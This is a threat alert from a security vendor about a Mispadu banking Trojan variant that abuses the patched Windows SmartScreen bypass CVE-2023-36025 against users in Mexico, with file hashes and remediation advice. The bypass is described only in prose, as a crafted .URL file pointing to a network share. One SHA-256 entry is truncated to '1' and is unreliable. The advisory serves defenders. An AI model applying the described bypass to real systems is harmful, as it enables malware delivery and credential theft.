Rewterz Threat Alert – Latest Variant of Mispadu Banking Trojan Takes Advantage of Windows SmartScreen Vulnerability – Active IOCs

Severity

High

Analysis Summary

The Mispadu banking Trojan, known for targeting victims in the Latin American region, has exploited a now-patched Windows SmartScreen security bypass flaw to compromise users in Mexico. This new variant of Mispadu, initially observed in 2019, uses phishing emails for propagation. Mispadu is a Delphi-based information stealer and has been part of a larger family of Latin American banking malware, including Grandoreiro.

The attack involves rogue internet shortcut files within bogus ZIP archives leveraging CVE-2023-36025, a high-severity bypass flaw in Windows SmartScreen, which was patched by Microsoft in November 2023. The exploit involves creating a crafted internet shortcut file (.URL) or hyperlink pointing to malicious files that can bypass SmartScreen’s warnings. The crafted .URL file contains a link to a threat actor’s network share with a malicious binary.

“The bypass is simple and relies on a parameter that references a network share, rather than a URL. The crafted .url file contains a link to a threat actor’s network share with a malicious binary,” researchers mentioned.

Once launched, Mispadu selectively targets victims based on their geographic location and system configurations, establishing contact with a command-and-control server for data exfiltration. The malware has been part of spam campaigns that harvested over 90,000 bank account credentials since August 2022.

The Windows SmartScreen flaw has been exploited by various cybercrime groups to deliver DarkGate and Phemedrone Stealer malware in recent months. Mexico has been a prime target for campaigns delivering information stealers and remote access trojans. A financially-motivated group known as TA558, operating since 2018, has attacked the hospitality and travel sectors in the Latin American region.

Additionally, a detailed analysis explained the workings of DICELOADER, a custom downloader used by the Russian e-crime group FIN7, delivered through malicious USB drives (BadUSB). DICELOADER is part of an intrusion set’s arsenal, including Carbanak RAT, utilizing sophisticated obfuscation methods to conceal command-and-control IP addresses and network communications.

Researchers also discovered two new malicious cryptocurrency mining campaigns employing booby-trapped archives and game hacks to deploy miner malware that mines Monero and Zephyr. This occurs amidst an evolving threat landscape with various cybercriminal groups employing advanced techniques for financial gain and data theft.

Impact

• Security Bypass
• Sensitive Information Theft

Indicators of Compromise

MD5

• 723df0296951abd2aeed01361cec6b0d
• 59698ce64c5af0473afd411bd774a5c4
• 2e6dc0900407d61395896a63025fa417
• 2112360f64fc1673da60f8a75d4935b7
• 6ce43b5b2fe55e4120f2a07a704ba244
• baead7afa8294aa22c95db34b1fef8ec
• eae83f4faad9356919741fac5a1153f1

SHA-256

• 8e1d354dccc3c689899dc4e75fdbdd0ab076ac457de7fb83645fb735a46ad4ea
• bc25f7836c273763827e1680856ec6d53bd73bbc4a03e9f743eddfc53cf68789
• fb3995289bac897e881141e281c18c606a772a53356cc81caf38e5c6296641d4
• 46d20fa82c936c5784f86106838697ab79a1f6dc243ae6721b42f0da467eaf52
• 03bdae4d40d3eb2db3c12d27b76ee170c4813f616fec5257cf25a068c46ba15f
• 1

SHA-1

• ba6d10e36f41c4ebc85f6beb95afd2b7c92406ad
• a4b223dd4b613c7d3e7fb899932486253c2197ab
• 4f5589b054068a0d42a7752bf22fcf2603debd65
• 47285d8372ca733ead51821a91c53b5e4c53c21b
• a9f6520a8de82c3d6e06c41317e126947a0fb553
• 6788b8fef5b1a0f1b54b2112fe1b3c2d3678c513
• 319feee9bd7908c77a11672c1e06b83b7201cfd4

Remediation

• Block all threat indicators at your respective controls.
• Search for Indicators of compromise IOCs in your environment utilizing your respective security controls.
• Ensure that all operating systems, software, and applications are regularly updated with the latest security patches.
• Conduct regular security awareness training for users to recognize and avoid phishing emails.
• Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
• Along with network and system hardening, code hardening should be implemented within the organization so that their websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed codes.
• Implement network segmentation to limit lateral movement within the network.
• Implement continuous monitoring of network traffic and endpoint activities to detect any unusual or suspicious behavior.
• Develop and regularly test an incident response plan to ensure a swift and effective response in case of a security incident.
• Implement SIEM solutions to centralize log collection and analysis. This can help in identifying patterns of suspicious behavior and provide timely alerts for potential security incidents.
• Regularly back up critical data and ensure that the backup copies are stored securely.